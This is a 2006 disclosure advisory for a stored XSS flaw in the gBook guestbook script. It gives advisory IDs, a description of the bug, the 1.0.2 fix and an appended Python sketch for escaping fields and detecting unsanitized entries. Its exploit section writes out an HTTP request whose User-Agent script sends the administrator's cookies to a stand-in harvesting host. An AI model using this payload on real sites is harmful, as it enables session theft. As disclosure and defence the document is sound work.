Further info about XSS vulnerability (fixed in gBook 1.0.2)
This document is copyright (c) 2006 M. Kristall and may be used under the terms
of the GNU Free Documentation License (FDL). Copies of the FDL are available at
<http://www.gnu.org/copyleft/fdl.html>.

IDs
Bugtraq 14725
SA16668
ISS X-Force 22114
CVE-2005-4727
ADV-2005-1617

Updated:
9 July 2006

Vulnerable:
gBook 1.0.1
gBook 1.0.0*

* gBook 1.0.0 is vulnerable but unaffected.

Mentions:
This vulnerability was originally mentioned in the gBook 1.0.2 ChangeLog file.
The (known) reports of this vulnerability are:
	"Removed a couple XSS vulnerabilities" (ChangeLog)
	<http://sourceforge.net/project/shownotes.php?release_id=353531>

	"Input Validation Error" (SecurityFocus)
	<http://www.securityfocus.com/bid/14725>

	"gBook Unspecified Cross-Site Scripting Vulnerabilities" (Secunia)
	<http://secunia.com/advisories/16668/>

	"GBook Multiple Cross-Site Scripting" (US-CERT)
	<http://www.us-cert.gov/cas/bulletins/SB05-250.html#gbook>

	"Multiple cross site scripting vulnerability" (FrSIRT)
	<http://www.frsirt.com/english/advisories/2005/1617>

	"gBook Multiple Unspecified XSS" (OSVDB)
	<http://www.osvdb.org/19144>

	"Unspecified Cross-Site Scripting" (Critical Watch)
	<http://www.criticalwatch.com/resources/vulnerability/viewvulnerability.aspx?ExposureID=11820>
	(Much of the information provided there is inaccurate.)

	"Multiple Unspecified Cross Site Scripting" (Hackers Center)
	<http://www.hackerscenter.com/archive/view.asp?id=17853>

	"gbook HTTP POST User-Agent cross-site scripting" (ISS)
	<http://xforce.iss.net/xforce/xfdb/22114>

	"Cross-side scripting vulnerability in gbook.cgi" (CVE)
	<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4727>


Description:
A specially crafted HTTP "User-Agent" header is stored along with the guestbook
entry and later causes execution of arbitrary JavaScript code in an
administrator's browser.


Detailed Info:
The User-Agent header is stored without sanitization, and this entry field is
not post-processed when it is displayed. A user aware of this vulnerability
might spoof his/her User-Agent when adding a new entry. When an administrator
logs in and opens the "Manage Entries" page, the stored code runs in his/her
browser.


Description of Fix:
As of gBook 1.0.2, the User-Agent header is treated like any other form field:
all characters that could have a special meaning in HTML are converted to the
corresponding SGML character entities before the entry is stored.


Detailed Description:
On line 569 of gbook.cgi (read_entries), a new field for the entries file is
generated from form fields and environment variables.

gBook 1.0.2 fixes this bug by doing the equivalent of changing line 560 to
sgmlize (@_POST{qw/name aim icq msn yim email www post/}, $ENV{'HTTP_USER_AGENT'});

(That is a shortened version of the actual code that is used. In gbook.cgi for
version 1.0.2, the actual line number is 519 due to code reorganization.)


Exploit:
An actual HTTP request exploiting this vulnerability might look like:
POST /path/to/gbook.cgi HTTP/1.1\r\n
Host: www.example.com\r\n
User-Agent: <script>document.location="http://some.other.site/cookie.harvester?"+document.cookie;</script>\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Referer: http://www.example.com/path/to/gbook.cgi/add.html\r\n
Content-Length: 82\r\n
\r\n
name=Your Name&aim=&icq=&msn=&yim=&email=email@address.host&www=&post=Some message


Warning:
gBook 1.0.2 is not immune to entries files that already contain unsanitized
("bad") fields. If such fields were created by an earlier version of gBook,
gBook 1.0.2 will be as susceptible as any other version when it displays them.
This may change in a newer version.
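As an added illustration (written in Python rather than the project's Perl, and not code from gBook), the following contrasts the pre-1.0.2 entry construction with the 1.0.2 fix from the "Description of Fix" section, and adds the check the Warning above implies: scanning an already stored entries file for fields that still hold raw markup. The field names come from the sgmlize() call quoted above; the entry layout, the exact escape set and the markup pattern are assumptions.

```python
import html
import re

# Fields gBook 1.0.2 passes through sgmlize() when an entry is created; the
# User-Agent header is treated as if it were one more of them.
FORM_FIELDS = ("name", "aim", "icq", "msn", "yim", "email", "www", "post")

# Pattern used to spot raw markup left in entries written by older versions.
TAG_RE = re.compile(r"<[^>]+>")

def sgmlize(value):
    """Stand-in for gBook's sgmlize(): turn the HTML-significant characters
    (assumed here to be & < > " ') into SGML character entities."""
    return html.escape(value, quote=True)

def build_entry_vulnerable(post, environ):
    """Pre-1.0.2 behaviour: form fields are escaped, but the User-Agent
    header is copied into the entry verbatim."""
    entry = {f: sgmlize(post.get(f, "")) for f in FORM_FIELDS}
    entry["agent"] = environ.get("HTTP_USER_AGENT", "")
    return entry

def build_entry_fixed(post, environ):
    """1.0.2 behaviour: the User-Agent header goes through sgmlize() along
    with the form fields before the entry is written."""
    entry = {f: sgmlize(post.get(f, "")) for f in FORM_FIELDS}
    entry["agent"] = sgmlize(environ.get("HTTP_USER_AGENT", ""))
    return entry

def find_unsanitized(entries):
    """Check for the Warning above: 1.0.2 displays old entries as stored, so
    report (entry index, field) for every field still holding raw markup."""
    return [(i, field) for i, entry in enumerate(entries)
            for field, value in entry.items() if TAG_RE.search(value)]

if __name__ == "__main__":
    # Constructed request: a guestbook post sent with a User-Agent that
    # carries markup (a harmless <b> tag stands in for a script).
    post = {"name": "Your Name", "email": "email@address.host",
            "post": "Some message"}
    environ = {"HTTP_USER_AGENT": "<b>constructed</b> Mozilla/5.0"}
    legacy = build_entry_vulnerable(post, environ)   # written by 1.0.1
    current = build_entry_fixed(post, environ)       # written by 1.0.2
    print("1.0.1 stored agent:", legacy["agent"])
    print("1.0.2 stored agent:", current["agent"])
    # The legacy entry is still flagged even though 1.0.2 is now in use.
    print("fields needing cleanup:", find_unsanitized([legacy, current]))
```

Running find_unsanitized() over a real entries file (after parsing it into the assumed dict layout) tells an administrator which old entries need to be re-escaped or removed before upgrading alone can be considered sufficient.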